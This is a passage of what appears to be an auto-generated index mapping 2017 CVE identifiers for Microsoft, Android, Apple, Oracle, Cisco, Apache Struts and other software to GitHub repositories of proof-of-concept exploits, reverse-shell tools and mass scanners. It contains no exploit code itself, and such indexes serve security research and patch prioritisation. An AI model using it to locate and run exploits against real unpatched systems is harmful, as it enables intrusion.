- [BRAINIAC22/CVE-2017-0199](https://github.com/BRAINIAC22/CVE-2017-0199)
- [Sunqiz/CVE-2017-0199-reprofuction](https://github.com/Sunqiz/CVE-2017-0199-reprofuction)
- [TheCyberWatchers/CVE-2017-0199-v5.0](https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0)
- [kash-123/CVE-2017-0199](https://github.com/kash-123/CVE-2017-0199)
### CVE-2017-0204 (2017-04-12)
Microsoft Outlook 2007 SP3, Microsoft Outlook 2010 SP2, Microsoft Outlook 2013 SP1, and Microsoft Outlook 2016 allow remote attackers to bypass the Office Protected View via a specially crafted document, aka "Microsoft Office Security Feature Bypass Vulnerability."
- [ryhanson/CVE-2017-0204](https://github.com/ryhanson/CVE-2017-0204)
### CVE-2017-0213 (2017-05-12)
Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214.
- [shaheemirza/CVE-2017-0213-](https://github.com/shaheemirza/CVE-2017-0213-)
- [zcgonvh/CVE-2017-0213](https://github.com/zcgonvh/CVE-2017-0213)
- [billa3283/CVE-2017-0213](https://github.com/billa3283/CVE-2017-0213)
- [likekabin/CVE-2017-0213](https://github.com/likekabin/CVE-2017-0213)
- [jbooz1/CVE-2017-0213](https://github.com/jbooz1/CVE-2017-0213)
- [eonrickity/CVE-2017-0213](https://github.com/eonrickity/CVE-2017-0213)
- [Jos675/CVE-2017-0213-Exploit](https://github.com/Jos675/CVE-2017-0213-Exploit)
- [Anonymous-Family/CVE-2017-0213](https://github.com/Anonymous-Family/CVE-2017-0213)
### CVE-2017-0248 (2017-05-12)
Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to bypass Enhanced Security Usage taggings when they present a certificate that is invalid for a specific use, aka ".NET Security Feature Bypass Vulnerability."
- [rubenmamo/CVE-2017-0248-Test](https://github.com/rubenmamo/CVE-2017-0248-Test)
### CVE-2017-0261 (2017-05-12)
Microsoft Office 2010 SP2, Office 2013 SP1, and Office 2016 allow a remote code execution vulnerability when the software fails to properly handle objects in memory, aka "Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0262 and CVE-2017-0281.
- [kcufId/eps-CVE-2017-0261](https://github.com/kcufId/eps-CVE-2017-0261)
- [erfze/CVE-2017-0261](https://github.com/erfze/CVE-2017-0261)
### CVE-2017-0263 (2017-05-12)
The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."
- [R06otMD5/cve-2017-0263-poc](https://github.com/R06otMD5/cve-2017-0263-poc)
### CVE-2017-0290 (2017-05-09)
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 does not properly scan a specially crafted file leading to memory corruption, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability."
- [homjxi0e/CVE-2017-0290-](https://github.com/homjxi0e/CVE-2017-0290-)
### CVE-2017-0358 (2018-04-13)
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
- [Wangsafz/cve-2017-0358.sh](https://github.com/Wangsafz/cve-2017-0358.sh)
### CVE-2017-0411 (2017-02-08)
An elevation of privilege vulnerability in the Framework APIs could enable a local malicious application to execute arbitrary code within the context of a privileged process. This issue is rated as High because it could be used to gain local access to elevated capabilities, which are not normally accessible to a third-party application. Product: Android. Versions: 7.0, 7.1.1. Android ID: A-33042690.
- [lulusudoku/PoC](https://github.com/lulusudoku/PoC)
### CVE-2017-0478 (2017-03-08)
A remote code execution vulnerability in the Framesequence library could enable an attacker using a specially crafted file to execute arbitrary code in the context of an unprivileged process. This issue is rated as High due to the possibility of remote code execution in an application that uses the Framesequence library. Product: Android. Versions: 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33718716.
- [bingghost/CVE-2017-0478](https://github.com/bingghost/CVE-2017-0478)
- [likekabin/CVE-2017-0478](https://github.com/likekabin/CVE-2017-0478)
### CVE-2017-0505 (2017-03-08)
An elevation of privilege vulnerability in MediaTek components, including the M4U driver, sound driver, touchscreen driver, GPU driver, and Command Queue driver, could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: N/A. Android ID: A-31822282. References: M-ALPS02992041.
- [R0rt1z2/CVE-2017-0505-mtk](https://github.com/R0rt1z2/CVE-2017-0505-mtk)
### CVE-2017-0541 (2017-04-07)
A remote code execution vulnerability in sonivox in Mediaserver could enable an attacker using a specially crafted file to cause memory corruption during media file and data processing. This issue is rated as Critical due to the possibility of remote code execution within the context of the Mediaserver process. Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-34031018.
- [C0dak/CVE-2017-0541](https://github.com/C0dak/CVE-2017-0541)
- [likekabin/CVE-2017-0541](https://github.com/likekabin/CVE-2017-0541)
### CVE-2017-0554 (2017-04-07)
An elevation of privilege vulnerability in the Telephony component could enable a local malicious application to access capabilities outside of its permission levels. This issue is rated as Moderate because it could be used to gain access to elevated capabilities, which are not normally accessible to a third-party application. Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1. Android ID: A-33815946.
- [lanrat/tethr](https://github.com/lanrat/tethr)
### CVE-2017-0564 (2017-04-07)
An elevation of privilege vulnerability in the kernel ION subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-34276203.
- [guoygang/CVE-2017-0564-ION-PoC](https://github.com/guoygang/CVE-2017-0564-ION-PoC)
### CVE-2017-0781 (2017-09-14)
A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146105.
- [ojasookert/CVE-2017-0781](https://github.com/ojasookert/CVE-2017-0781)
- [X3eRo0/android712-blueborne](https://github.com/X3eRo0/android712-blueborne)
- [mjancek/BlueborneDetection](https://github.com/mjancek/BlueborneDetection)
- [CrackSoft900/Blue-Borne](https://github.com/CrackSoft900/Blue-Borne)
- [CarlosDelRosario7/sploit-bX](https://github.com/CarlosDelRosario7/sploit-bX)
- [DamianSuess/Learn.BlueJam](https://github.com/DamianSuess/Learn.BlueJam)
### CVE-2017-0785 (2017-09-14)
A information disclosure vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146698.
- [ojasookert/CVE-2017-0785](https://github.com/ojasookert/CVE-2017-0785)
- [aymankhalfatni/CVE-2017-0785](https://github.com/aymankhalfatni/CVE-2017-0785)
- [Alfa100001/-CVE-2017-0785-BlueBorne-PoC](https://github.com/Alfa100001/-CVE-2017-0785-BlueBorne-PoC)
- [Hackerscript/BlueBorne-CVE-2017-0785](https://github.com/Hackerscript/BlueBorne-CVE-2017-0785)
- [pieterbork/blueborne](https://github.com/pieterbork/blueborne)
- [sigbitsadmin/diff](https://github.com/sigbitsadmin/diff)
- [RavSS/Bluetooth-Crash-CVE-2017-0785](https://github.com/RavSS/Bluetooth-Crash-CVE-2017-0785)
- [sh4rknado/BlueBorn](https://github.com/sh4rknado/BlueBorn)
- [Joanmei/CVE-2017-0785](https://github.com/Joanmei/CVE-2017-0785)
- [CyberKimathi/Py3-CVE-2017-0785](https://github.com/CyberKimathi/Py3-CVE-2017-0785)
- [MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-](https://github.com/MasterCode112/Upgraded_BlueBourne-CVE-2017-0785-)
### CVE-2017-0806 (2017-10-03)
An elevation of privilege vulnerability in the Android framework (gatekeeperresponse). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-62998805.
- [michalbednarski/ReparcelBug](https://github.com/michalbednarski/ReparcelBug)
### CVE-2017-0807 (2017-10-03)
An elevation of privilege vulnerability in the Android framework (ui framework). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2. Android ID: A-35056974.
- [kpatsakis/PoC_CVE-2017-0807](https://github.com/kpatsakis/PoC_CVE-2017-0807)
### CVE-2017-75
- [CalebFIN/EXP-CVE-2017-75](https://github.com/CalebFIN/EXP-CVE-2017-75)
### CVE-2017-1235 (2017-09-25)
IBM WebSphere MQ 8.0 could allow an authenticated user to cause a premature termination of a client application thread which could potentially cause denial of service. IBM X-Force ID: 123914.
- [11k4r/CVE-2017-1235_exploit](https://github.com/11k4r/CVE-2017-1235_exploit)
### CVE-2017-1635 (2017-12-13)
IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243.
- [emcalv/tivoli-poc](https://github.com/emcalv/tivoli-poc)
- [bcdannyboy/cve-2017-1635-PoC](https://github.com/bcdannyboy/cve-2017-1635-PoC)
### CVE-2017-2368 (2017-02-20)
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. The issue involves the "Contacts" component. It allows remote attackers to cause a denial of service (application crash) via a crafted contact card.
- [vincedes3/CVE-2017-2368](https://github.com/vincedes3/CVE-2017-2368)
### CVE-2017-2370 (2017-02-20)
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. macOS before 10.12.3 is affected. tvOS before 10.1.1 is affected. watchOS before 3.1.3 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app.
- [maximehip/extra_recipe](https://github.com/maximehip/extra_recipe)
- [JackBro/extra_recipe](https://github.com/JackBro/extra_recipe)
- [Rootkitsmm-zz/extra_recipe-iOS-10.2](https://github.com/Rootkitsmm-zz/extra_recipe-iOS-10.2)
- [Peterpan0927/CVE-2017-2370](https://github.com/Peterpan0927/CVE-2017-2370)
### CVE-2017-2388 (2017-04-02)
An issue was discovered in certain Apple products. macOS before 10.12.4 is affected. The issue involves the "IOFireWireFamily" component. It allows attackers to cause a denial of service (NULL pointer dereference) via a crafted app.
- [bazad/IOFireWireFamily-null-deref](https://github.com/bazad/IOFireWireFamily-null-deref)
### CVE-2017-2636 (2017-03-07)
Race condition in drivers/tty/n_hdlc.c in the Linux kernel through 4.10.1 allows local users to gain privileges or cause a denial of service (double free) by setting the HDLC line discipline.
- [alexzorin/cve-2017-2636-el](https://github.com/alexzorin/cve-2017-2636-el)
### CVE-2017-2666 (2018-07-27)
It was discovered in Undertow that the code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own.
- [tafamace/CVE-2017-2666](https://github.com/tafamace/CVE-2017-2666)
### CVE-2017-2671 (2017-04-05)
The ping_unhash function in net/ipv4/ping.c in the Linux kernel through 4.10.8 is too late in obtaining a certain lock and consequently cannot ensure that disconnect function calls are safe, which allows local users to cause a denial of service (panic) by leveraging access to the protocol value of IPPROTO_ICMP in a socket system call.
- [homjxi0e/CVE-2017-2671](https://github.com/homjxi0e/CVE-2017-2671)
### CVE-2017-2741 (2018-01-23)
A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability could potentially be exploited to execute arbitrary code.
- [dopheide-esnet/zeek-jetdirect](https://github.com/dopheide-esnet/zeek-jetdirect)
### CVE-2017-2751 (2018-10-03)
A BIOS password extraction vulnerability has been reported on certain consumer notebooks with firmware F.22 and others. The BIOS password was stored in CMOS in a way that allowed it to be extracted. This applies to consumer notebooks launched in early 2014.
- [BaderSZ/CVE-2017-2751](https://github.com/BaderSZ/CVE-2017-2751)
### CVE-2017-2793 (2017-05-23)
An exploitable heap corruption vulnerability exists in the UnCompressUnicode functionality of Antenna House DMC HTMLFilter used by MarkLogic 8.0-6. A specially crafted xls file can cause a heap corruption resulting in arbitrary code execution. An attacker can send/provide malicious XLS file to trigger this vulnerability.
- [sUbc0ol/Detection-for-CVE-2017-2793](https://github.com/sUbc0ol/Detection-for-CVE-2017-2793)
### CVE-2017-2824 (2017-05-24)
An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.
- [listenquiet/cve-2017-2824-reverse-shell](https://github.com/listenquiet/cve-2017-2824-reverse-shell)
### CVE-2017-2903 (2018-04-24)
An exploitable integer overflow exists in the DPX loading functionality of the Blender open-source 3d creation suite version 2.78c. A specially crafted '.cin' file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can convince a user to use the file as an asset via the sequencer in order to trigger this vulnerability.
- [SpiralBL0CK/dpx_work_CVE-2017-2903](https://github.com/SpiralBL0CK/dpx_work_CVE-2017-2903)
### CVE-2017-3000 (2017-03-14)
Adobe Flash Player versions 24.0.0.221 and earlier have a vulnerability in the random number generator used for constant blinding. Successful exploitation could lead to information disclosure.
- [dangokyo/CVE-2017-3000](https://github.com/dangokyo/CVE-2017-3000)
### CVE-2017-3066 (2017-04-27)
Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution.
- [codewhitesec/ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn)
- [cucadili/CVE-2017-3066](https://github.com/cucadili/CVE-2017-3066)
### CVE-2017-3078 (2017-06-20)
Adobe Flash Player versions 25.0.0.171 and earlier have an exploitable memory corruption vulnerability in the Adobe Texture Format (ATF) module. Successful exploitation could lead to arbitrary code execution.
- [homjxi0e/CVE-2017-3078](https://github.com/homjxi0e/CVE-2017-3078)
### CVE-2017-3143 (2019-01-16)
An attacker who is able to send and receive messages to an authoritative DNS server and who has knowledge of a valid TSIG key name for the zone and service being targeted may be able to manipulate BIND into accepting an unauthorized dynamic update. Affects BIND 9.4.0->9.8.8, 9.9.0->9.9.10-P1, 9.10.0->9.10.5-P1, 9.11.0->9.11.1-P1, 9.9.3-S1->9.9.10-S2, 9.10.5-S1->9.10.5-S2.
- [saaph/CVE-2017-3143](https://github.com/saaph/CVE-2017-3143)
### CVE-2017-3164 (2019-03-08)
Server Side Request Forgery in Apache Solr, versions 1.3 until 7.6 (inclusive). Since the "shards" parameter does not have a corresponding whitelist mechanism, a remote attacker with access to the server could make Solr perform an HTTP GET request to any reachable URL.
- [tdwyer/PoC_CVE-2017-3164_CVE-2017-1262](https://github.com/tdwyer/PoC_CVE-2017-3164_CVE-2017-1262)
### CVE-2017-3241 (2017-01-27)
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111; JRockit: R28.3.12. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS v3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts).
- [xfei3/CVE-2017-3241-POC](https://github.com/xfei3/CVE-2017-3241-POC)
- [scopion/CVE-2017-3241](https://github.com/scopion/CVE-2017-3241)
### CVE-2017-3248 (2017-01-27)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS v3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts).
- [ianxtianxt/CVE-2017-3248](https://github.com/ianxtianxt/CVE-2017-3248)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [BabyTeam1024/CVE-2017-3248](https://github.com/BabyTeam1024/CVE-2017-3248)
### CVE-2017-3506 (2017-04-24)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).
- [ianxtianxt/CVE-2017-3506](https://github.com/ianxtianxt/CVE-2017-3506)
- [Al1ex/CVE-2017-3506](https://github.com/Al1ex/CVE-2017-3506)
### CVE-2017-3599 (2017-04-24)
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet.
- [SECFORCE/CVE-2017-3599](https://github.com/SECFORCE/CVE-2017-3599)
- [jptr218/mysql_dos](https://github.com/jptr218/mysql_dos)
### CVE-2017-3730 (2017-05-04)
In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this can result in the client attempting to dereference a NULL pointer leading to a client crash. This could be exploited in a Denial of Service attack.
- [guidovranken/CVE-2017-3730](https://github.com/guidovranken/CVE-2017-3730)
### CVE-2017-3881 (2017-03-17)
A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
- [artkond/cisco-rce](https://github.com/artkond/cisco-rce)
- [homjxi0e/CVE-2017-3881-exploit-cisco-](https://github.com/homjxi0e/CVE-2017-3881-exploit-cisco-)
- [homjxi0e/CVE-2017-3881-Cisco](https://github.com/homjxi0e/CVE-2017-3881-Cisco)
- [mzakyz666/PoC-CVE-2017-3881](https://github.com/mzakyz666/PoC-CVE-2017-3881)
- [1337g/CVE-2017-3881](https://github.com/1337g/CVE-2017-3881)
### CVE-2017-4490
- [homjxi0e/CVE-2017-4490-](https://github.com/homjxi0e/CVE-2017-4490-)
- [homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-](https://github.com/homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-)
### CVE-2017-4878
- [brianwrf/CVE-2017-4878-Samples](https://github.com/brianwrf/CVE-2017-4878-Samples)
### CVE-2017-4971 (2017-06-13)
An issue was discovered in Pivotal Spring Web Flow through 2.4.4. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings.
- [cved-sources/cve-2017-4971](https://github.com/cved-sources/cve-2017-4971)
### CVE-2017-5005 (2017-01-02)
Stack-based buffer overflow in Quick Heal Internet Security 10.1.0.316 and earlier, Total Security 10.1.0.316 and earlier, and AntiVirus Pro 10.1.0.316 and earlier on OS X allows remote attackers to execute arbitrary code via a crafted LC_UNIXTHREAD.cmdsize field in a Mach-O file that is mishandled during a Security Scan (aka Custom Scan) operation.
- [payatu/QuickHeal](https://github.com/payatu/QuickHeal)
### CVE-2017-5007 (2017-02-17)
Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled the sequence of events when closing a page, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.
- [Ang-YC/CVE-2017-5007](https://github.com/Ang-YC/CVE-2017-5007)
### CVE-2017-5123 (2021-11-02)
Insufficient data validation in waitid allowed an user to escape sandboxes on Linux.
- [FloatingGuy/CVE-2017-5123](https://github.com/FloatingGuy/CVE-2017-5123)
- [0x5068656e6f6c/CVE-2017-5123](https://github.com/0x5068656e6f6c/CVE-2017-5123)
- [Synacktiv-contrib/exploiting-cve-2017-5123](https://github.com/Synacktiv-contrib/exploiting-cve-2017-5123)
- [teawater/CVE-2017-5123](https://github.com/teawater/CVE-2017-5123)
- [c3r34lk1ll3r/CVE-2017-5123](https://github.com/c3r34lk1ll3r/CVE-2017-5123)
- [h1bAna/CVE-2017-5123](https://github.com/h1bAna/CVE-2017-5123)
### CVE-2017-5124 (2018-02-07)
Incorrect application of sandboxing in Blink in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted MHTML page.
- [Bo0oM/CVE-2017-5124](https://github.com/Bo0oM/CVE-2017-5124)
### CVE-2017-5223 (2017-01-16)
An issue was discovered in PHPMailer before 5.2.22. PHPMailer's msgHTML method applies transformations to an HTML document to make it usable as an email message body. One of the transformations is to convert relative image URLs into attachments using a script-provided base directory. If no base directory is provided, it resolves to /, meaning that relative image URLs get treated as absolute local file paths and added as attachments. To form a remote vulnerability, the msgHTML method must be called, passed an unfiltered, user-supplied HTML document, and must not set a base directory.
- [cscli/CVE-2017-5223](https://github.com/cscli/CVE-2017-5223)
### CVE-2017-5415 (2018-06-11)
An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by "blob:" as the protocol, leading to user confusion and further spoofing attacks. This vulnerability affects Firefox < 52.
- [649/CVE-2017-5415](https://github.com/649/CVE-2017-5415)
### CVE-2017-5487 (2017-01-15)
wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
- [teambugsbunny/wpUsersScan](https://github.com/teambugsbunny/wpUsersScan)
- [R3K1NG/wpUsersScan](https://github.com/R3K1NG/wpUsersScan)
- [GeunSam2/CVE-2017-5487](https://github.com/GeunSam2/CVE-2017-5487)
- [patilkr/wp-CVE-2017-5487-exploit](https://github.com/patilkr/wp-CVE-2017-5487-exploit)
- [zkhalidul/GrabberWP-CVE-2017-5487](https://github.com/zkhalidul/GrabberWP-CVE-2017-5487)
- [SeasonLeague/CVE-2017-5487](https://github.com/SeasonLeague/CVE-2017-5487)
- [Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM](https://github.com/Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM)
- [K3ysTr0K3R/CVE-2017-5487-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-5487-EXPLOIT)
- [dream434/CVE-2017-5487](https://github.com/dream434/CVE-2017-5487)
### CVE-2017-5633 (2017-03-06)
Multiple cross-site request forgery (CSRF) vulnerabilities on the D-Link DI-524 Wireless Router with firmware 9.01 allow remote attackers to (1) change the admin password, (2) reboot the device, or (3) possibly have unspecified other impact via crafted requests to CGI programs.
- [cardangi/Exploit-CVE-2017-5633](https://github.com/cardangi/Exploit-CVE-2017-5633)
### CVE-2017-5638 (2017-03-11)
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
- [PolarisLab/S2-045](https://github.com/PolarisLab/S2-045)
- [Flyteas/Struts2-045-Exp](https://github.com/Flyteas/Struts2-045-Exp)
- [bongbongco/cve-2017-5638](https://github.com/bongbongco/cve-2017-5638)
- [jas502n/S2-045-EXP-POC-TOOLS](https://github.com/jas502n/S2-045-EXP-POC-TOOLS)
- [mthbernardes/strutszeiro](https://github.com/mthbernardes/strutszeiro)
- [xsscx/cve-2017-5638](https://github.com/xsscx/cve-2017-5638)
- [immunio/apache-struts2-CVE-2017-5638](https://github.com/immunio/apache-struts2-CVE-2017-5638)
- [Masahiro-Yamada/OgnlContentTypeRejectorValve](https://github.com/Masahiro-Yamada/OgnlContentTypeRejectorValve)
- [aljazceru/CVE-2017-5638-Apache-Struts2](https://github.com/aljazceru/CVE-2017-5638-Apache-Struts2)
- [sjitech/test_struts2_vulnerability_CVE-2017-5638](https://github.com/sjitech/test_struts2_vulnerability_CVE-2017-5638)
- [jrrombaldo/CVE-2017-5638](https://github.com/jrrombaldo/CVE-2017-5638)
- [random-robbie/CVE-2017-5638](https://github.com/random-robbie/CVE-2017-5638)
- [initconf/CVE-2017-5638_struts](https://github.com/initconf/CVE-2017-5638_struts)
- [mazen160/struts-pwn](https://github.com/mazen160/struts-pwn)
- [ret2jazzy/Struts-Apache-ExploitPack](https://github.com/ret2jazzy/Struts-Apache-ExploitPack)
- [lolwaleet/ExpStruts](https://github.com/lolwaleet/ExpStruts)
- [oktavianto/CVE-2017-5638-Apache-Struts2](https://github.com/oktavianto/CVE-2017-5638-Apache-Struts2)
- [jrrdev/cve-2017-5638](https://github.com/jrrdev/cve-2017-5638)
- [opt9/Strutshock](https://github.com/opt9/Strutshock)
- [falcon-lnhg/StrutsShell](https://github.com/falcon-lnhg/StrutsShell)
- [bhagdave/CVE-2017-5638](https://github.com/bhagdave/CVE-2017-5638)
- [KarzsGHR/S2-046_S2-045_POC](https://github.com/KarzsGHR/S2-046_S2-045_POC)
- [gsfish/S2-Reaper](https://github.com/gsfish/S2-Reaper)
- [mcassano/cve-2017-5638](https://github.com/mcassano/cve-2017-5638)
- [opt9/Strutscli](https://github.com/opt9/Strutscli)
- [tahmed11/strutsy](https://github.com/tahmed11/strutsy)
- [payatu/CVE-2017-5638](https://github.com/payatu/CVE-2017-5638)
- [Aasron/Struts2-045-Exp](https://github.com/Aasron/Struts2-045-Exp)
- [SpiderMate/Stutsfi](https://github.com/SpiderMate/Stutsfi)
- [jpacora/Struts2Shell](https://github.com/jpacora/Struts2Shell)
- [AndreasKl/CVE-2017-5638](https://github.com/AndreasKl/CVE-2017-5638)
- [riyazwalikar/struts-rce-cve-2017-5638](https://github.com/riyazwalikar/struts-rce-cve-2017-5638)
- [homjxi0e/CVE-2017-5638](https://github.com/homjxi0e/CVE-2017-5638)
- [eeehit/CVE-2017-5638](https://github.com/eeehit/CVE-2017-5638)
- [sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner)
- [sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638](https://github.com/sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638)
- [R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-](https://github.com/R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-)
- [Xhendos/CVE-2017-5638](https://github.com/Xhendos/CVE-2017-5638)
- [TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner)
- [invisiblethreat/strutser](https://github.com/invisiblethreat/strutser)
